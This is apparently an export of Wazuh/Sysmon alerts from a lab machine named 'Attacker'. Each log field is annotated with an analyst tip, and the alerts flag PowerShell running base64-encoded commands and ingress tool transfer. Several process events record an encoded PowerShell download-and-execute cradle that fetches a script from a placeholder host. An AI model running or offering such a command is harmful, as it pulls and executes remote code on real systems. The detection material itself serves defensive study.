data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 55 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534246.1406711 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:24.1476257Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283761 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:24.093
ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ProcessId: 11516
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1
CreationUtcTime: 2025-04-24 22:37:24.093
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:24.093 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:24.093 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 52 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534250.1409480 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:28.2950627Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283820 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:26.762
ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ProcessId: 2020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ParentProcessId: 11516
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:26.762 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 56 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534250.1417547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:28.5074564Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283821 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:28.496
ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ProcessId: 2020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1
CreationUtcTime: 2025-04-24 22:37:28.496
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:28.496 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd26-680a-460b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1d1jb0yp.gxm.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:28.496 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.5.6'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534253.1420312 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26156 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Special Logon' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.5.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Special Logon"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Special Logon"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 53 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534254.1423149 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:31.5031620Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283846 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:30.168
ProcessGuid: {94294ddc-bd2a-680a-490b-000000000e00}
ProcessId: 10656
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd26-680a-460b-000000000e00}
ParentProcessId: 2020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:30.168 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd2a-680a-490b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10656 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
